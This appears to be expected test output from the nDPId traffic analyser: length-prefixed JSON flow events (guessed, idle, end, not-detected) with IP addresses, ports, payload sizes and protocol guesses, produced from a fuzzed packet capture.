00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854543322,"flow_last_seen":1031854543322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"0.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7440000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Cloudflare","breed":"Acceptable","category":"Web"},"http": {}}
00596{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7440000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535090,"flow_last_seen":1031854535090,"flow_idle_time":7440000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"44.20.3.5","src_port":80,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}}
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854535021,"flow_last_seen":1031854535021,"flow_idle_time":7440000,"flow_min_l4_payload_len":423,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":423,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"51.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"72.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00660{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854484481,"flow_last_seen":1031854484482,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1031854488666,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5827,"flow_avg_l4_payload_len":529,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1031854495447,"flow_last_seen":1031854506544,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":1195,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00601{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854488668,"flow_last_seen":1031854488668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":81,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854525903,"flow_last_seen":1031854525903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.82.5","src_port":80,"dst_port":2603,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00591{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854514843,"flow_last_seen":1031854525904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854532143,"flow_last_seen":1031854532143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.68.5","src_port":80,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1031854532142,"flow_last_seen":1031854543315,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1823,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1031854535021,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2605,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7440000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854557802,"flow_last_seen":1031854568982,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4508,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7440000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1031854562320,"flow_last_seen":1031854562528,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":423,"flow_tot_l4_payload_len":423,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1031854565447,"flow_last_seen":1031854565700,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":177,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
